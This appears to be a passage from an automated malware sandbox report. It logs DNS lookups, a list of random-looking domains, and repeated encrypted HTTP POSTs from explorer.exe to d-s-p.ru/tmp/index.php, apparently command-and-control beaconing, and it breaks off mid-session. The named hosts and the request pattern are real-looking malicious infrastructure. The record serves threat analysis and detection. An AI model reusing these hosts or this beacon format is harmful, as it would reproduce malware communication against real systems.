                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru41.248.133.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru181.128.92.66A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru102.189.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru102.220.140.62A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru41.248.133.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru181.128.92.66A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:09.342211008 CET1.1.1.1192.168.2.40xe04dNo error (0)www.tazc.com.mytazc.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:09.342211008 CET1.1.1.1192.168.2.40xe04dNo error (0)tazc.com.my51.79.230.147A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:37.369328976 CET1.1.1.1192.168.2.40xe8f0No error (0)upadaria.org192.185.146.136A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:40.928714991 CET1.1.1.1192.168.2.40x3c69No error (0)lotuseffectllc.com192.185.175.158A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:51.307658911 CET1.1.1.1192.168.2.40x4e64No error (0)webdot.ddns.net87.120.115.216A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:54.779248953 CET1.1.1.1192.168.2.40xeb88No error (0)firemane.org45.118.248.184A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:46:06.104362011 CET1.1.1.1192.168.2.40x1ab2Name error (3)kdtIFBJmLPfUAdsjOyiinDxA.kdtIFBJmLPfUAdsjOyiinDxAnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • www.tazc.com.my
                                                                                                                                                                                • upadaria.org
                                                                                                                                                                                • lotuseffectllc.com
                                                                                                                                                                                • firemane.org
                                                                                                                                                                                • cjwipwxdaicmvf.net
                                                                                                                                                                                  • d-s-p.ru
                                                                                                                                                                                • syotscpmruqadjb.net
                                                                                                                                                                                • ixkqycfpabx.org
                                                                                                                                                                                • npglxuptseuhsgp.org
                                                                                                                                                                                • bqeerlntfui.org
                                                                                                                                                                                • uunijchpjmgfo.org
                                                                                                                                                                                • fsblnagupakjnja.org
                                                                                                                                                                                • urvsasyqvqgwxp.org
                                                                                                                                                                                • duabtcnoqxwepta.org
                                                                                                                                                                                • ilgayipokchjnwi.org
                                                                                                                                                                                • jifjhlrdcghs.net
                                                                                                                                                                                • yawtrsbxaqno.net
                                                                                                                                                                                • askrbnixhwd.net
                                                                                                                                                                                • bmvgxhhwuegchsnk.com
                                                                                                                                                                                • fumgmeseepesr.com
                                                                                                                                                                                • kjsrpmbmjduiwv.net
                                                                                                                                                                                • ksvvejaqmamsa.net
                                                                                                                                                                                • vtfnihcjaxwmos.com
                                                                                                                                                                                • amrgqqtkvbsuyfiq.com
                                                                                                                                                                                • htevegfcswyxd.net
                                                                                                                                                                                • hxhrbhxaiegx.com
                                                                                                                                                                                • nysccihvdkds.net
                                                                                                                                                                                • grgynsvjunbdyj.org
                                                                                                                                                                                • rkeqfvulevu.org
                                                                                                                                                                                • paiaccswdvwaulm.net
                                                                                                                                                                                • ecpopbfcnylhn.net
                                                                                                                                                                                • wgfecinevmagrs.net
                                                                                                                                                                                • wgggkliaxflrlukv.org
                                                                                                                                                                                • abtqqggxsfhktnpg.com
                                                                                                                                                                                • wluclgmelcx.net
                                                                                                                                                                                • cskorkkrkwytkhtu.org
                                                                                                                                                                                • fghaoijaskpcuqs.org
                                                                                                                                                                                • ufwlknyimcdyhhff.net
                                                                                                                                                                                • jessdujhjjx.com
                                                                                                                                                                                • hsmioefmqryctki.org
                                                                                                                                                                                • mmcpyibdxwiwlos.org
                                                                                                                                                                                • bqqqwcluixvv.com
                                                                                                                                                                                • wojftrqpwndwmdu.net
                                                                                                                                                                                • rcluvmsnbxjmn.com
                                                                                                                                                                                • abpyxpuyjhta.org
                                                                                                                                                                                • anvunsnhjllayr.net
                                                                                                                                                                                • iupqlsqcljbulu.net
                                                                                                                                                                                • ovyowegmnacdkibi.org
                                                                                                                                                                                • lsjajjgmqahp.com
                                                                                                                                                                                • ovpfvtkrixi.net
                                                                                                                                                                                • ddedgrkngjekmoj.org
                                                                                                                                                                                • ypotdnyqkrcswq.org
                                                                                                                                                                                • oywmgpnhuhb.net
                                                                                                                                                                                • laowevegchj.org
                                                                                                                                                                                • dqncwrghqkte.org
                                                                                                                                                                                • agvphbybllsas.net
                                                                                                                                                                                • mjrsolarxwh.com
                                                                                                                                                                                • njmhqmwqrarclhje.org
                                                                                                                                                                                • visknbdtdhq.org
                                                                                                                                                                                • iasmrrglydiueqr.org
                                                                                                                                                                                • xhjqltphdtwpxuw.net
                                                                                                                                                                                • aqewaciknwcref.org
                                                                                                                                                                                • newmvklahrrrgqt.com
                                                                                                                                                                                • plkttxwuhrfxb.net
                                                                                                                                                                                • jhajwwseppqky.net
                                                                                                                                                                                • dltxnhcbkmo.net
                                                                                                                                                                                • hhxuaiudkfar.net
                                                                                                                                                                                • 101.99.94.162
                                                                                                                                                                                • hssuixmkgbellf.net
                                                                                                                                                                                • lnwqqljmdwq.net
                                                                                                                                                                                • mvyahhxtkfb.net
                                                                                                                                                                                • pagpbwhildwqiuis.net

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.44973658.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:22.097021103 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://cjwipwxdaicmvf.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 311
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:22.097083092 CET311OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 03 ff 88
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA .[k,vun{GuoS.-E@if_A5QQtUT#{gMO@h5&MMBYR<F S73xl)r7|Rg
                                                                                                                                                                                Dec 30, 2024 19:42:23.661969900 CET152INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:23 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 04 00 00 00 72 e8 82 ee
                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.44973758.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:23.671211958 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://syotscpmruqadjb.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 248
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:23.671245098 CET248OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 24 3d c3 95
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu$=yLStS6S;15ZLCTM/n.&BXAoqKsI8SK:v.cCh-`hJ2"
                                                                                                                                                                                Dec 30, 2024 19:42:25.118741989 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:24 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.44973858.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:25.128454924 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ixkqycfpabx.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:25.128479004 CET129OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 31 3b be 93
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu1;_Ed`I?@h7Xk
                                                                                                                                                                                Dec 30, 2024 19:42:26.598766088 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:26 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.44973958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:26.607853889 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://npglxuptseuhsgp.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 325
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:26.607887030 CET325OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4e 0a e3 f7
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuN6yxNmA,q{7:bVr/O[Z4RKDS |>;/htlo6:C`E!npoN(}slP9\X
                                                                                                                                                                                Dec 30, 2024 19:42:28.066045046 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:27 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.44974058.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:28.074415922 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://bqeerlntfui.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:28.074431896 CET129OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 76 42 b9 ad
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuvB/-{VT|dx2X
                                                                                                                                                                                Dec 30, 2024 19:42:29.526232004 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:29 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                5192.168.2.44974158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:29.534080029 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://uunijchpjmgfo.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 174
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:29.534080029 CET174OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 67 2f d9 e1
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vug/upoLvY(p{pIEY|2J2@H=o).h3_?z
                                                                                                                                                                                Dec 30, 2024 19:42:31.023500919 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:30 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                6192.168.2.44974258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:31.031085014 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://fsblnagupakjnja.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 219
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:31.031085014 CET219OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 6c 51 ac 94
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vulQ?z[w?gd)|qT;.C\W%JkO?,K9^%UJF#S"t
                                                                                                                                                                                Dec 30, 2024 19:42:32.476174116 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:32 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                7192.168.2.44974358.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:32.486035109 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://urvsasyqvqgwxp.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:32.486073971 CET142OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 22 04 ee e6
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu"g@t_*<?_3D[6NGPu(T
                                                                                                                                                                                Dec 30, 2024 19:42:33.955096006 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:33 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                8192.168.2.44974458.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:33.963368893 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
